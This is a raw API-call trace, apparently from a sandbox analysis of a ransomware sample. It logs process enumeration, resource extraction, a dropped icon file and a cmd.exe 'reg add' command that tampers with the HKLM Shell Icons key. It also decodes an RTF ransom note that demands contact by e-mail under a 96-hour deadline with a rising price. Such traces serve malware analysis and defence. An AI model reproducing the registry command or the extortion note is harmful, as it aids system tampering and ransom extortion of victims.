dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0112.642] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0112.643] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0112.644] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.645] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0112.646] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0112.647] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0112.648] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.649] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.650] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.651] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.652] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.653] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd2c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bkM66bYk.exe")) returned 1 [0112.654] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.654] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.655] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd5c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bkM66bYk.exe")) returned 1 [0112.656] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd5c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bkM66bYk.exe")) returned 0 [0112.657] CloseHandle (hObject=0xf4) returned 1 [0112.657] FindResourceW (hModule=0x400000, lpName="BICO", lpType=0xa) returned 0x51c2e0 [0112.657] LoadResource (hModule=0x400000, hResInfo=0x51c2e0) returned 0x509760 [0112.657] SizeofResource (hModule=0x400000, hResInfo=0x51c2e0) returned 0x3dfb [0112.657] LockResource (hResData=0x509760) returned 0x509760 [0112.658] FreeResource (hResData=0x509760) returned 0 [0112.658] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0112.658] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0112.658] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0112.658] LockResource (hResData=0x50d64c) returned 0x50d64c [0112.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361ec0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0112.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361ec0, cbMultiByte=38, lpWideCharStr=0x133e14c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0112.658] FreeResource (hResData=0x50d64c) returned 0 [0112.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1361ec4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0112.658] GetCurrentThreadId () returned 0xaf0 [0112.658] GetCurrentThreadId () returned 0xaf0 [0112.658] GetCurrentThreadId () returned 0xaf0 [0112.658] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\7l6OWDI9Fmrsoy1O.ico" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\7l6owdi9fmrsoy1o.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0112.659] WriteFile (in: hFile=0xf4, lpBuffer=0x126c830*, nNumberOfBytesToWrite=0x3dfb, lpNumberOfBytesWritten=0x12fbb8, lpOverlapped=0x0 | out: lpBuffer=0x126c830*, lpNumberOfBytesWritten=0x12fbb8*=0x3dfb, lpOverlapped=0x0) returned 1 [0112.660] CloseHandle (hObject=0xf4) returned 1 [0112.660] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\", lpszShortPath=0x125bfcc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\") returned 0x32 [0112.661] CharUpperBuffW (in: lpsz="reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"", cchLength=0xc8 | out: lpsz="REG ADD \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL ICONS\" /F && REG ADD \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL ICONS\" /V \"29\" /T REG_SZ /F /D \"[ICO_PATH],0\"") returned 0xc8 [0112.661] CharUpperBuffW (in: lpsz="[ICO_PATH]", cchLength=0xa | out: lpsz="[ICO_PATH]") returned 0xa [0112.661] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbac*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb9c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"", lpProcessInformation=0x12fb9c*(hProcess=0xf0, hThread=0xf4, dwProcessId=0xd8c, dwThreadId=0xd90)) returned 1 [0112.813] CloseHandle (hObject=0xf0) returned 1 [0112.813] CloseHandle (hObject=0xf4) returned 1 [0112.813] FindResourceW (hModule=0x400000, lpName="RDM", lpType=0xa) returned 0x51c4c0 [0112.813] LoadResource (hModule=0x400000, hResInfo=0x51c4c0) returned 0x516fbc [0112.813] SizeofResource (hModule=0x400000, hResInfo=0x51c4c0) returned 0x15f2 [0112.813] LockResource (hResData=0x516fbc) returned 0x516fbc [0112.813] FreeResource (hResData=0x516fbc) returned 0 [0112.813] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0112.813] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0112.813] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0112.813] LockResource (hResData=0x50d64c) returned 0x50d64c [0112.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361ec0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0112.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361ec0, cbMultiByte=38, lpWideCharStr=0x133e1ac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0112.813] FreeResource (hResData=0x50d64c) returned 0 [0112.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1361ec4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0112.813] GetCurrentThreadId () returned 0xaf0 [0112.813] GetCurrentThreadId () returned 0xaf0 [0112.813] GetCurrentThreadId () returned 0xaf0 [0112.814] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x125bfa8, cbMultiByte=5618, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5618 [0112.814] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x125bfa8, cbMultiByte=5618, lpWideCharStr=0x125f60c, cchWideChar=5618 | out: lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! \\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 !\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 [KID]\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 [EML1]\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 ur d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 ! \\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! \\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 th\\'e5 d\\'e5\\'f1rypti\\'een will b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r") returned 5618 [0112.814] CharUpperBuffW (in: lpsz="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! \\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 !\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 [KID]\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 [EML1]\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 ur d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 ! \\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 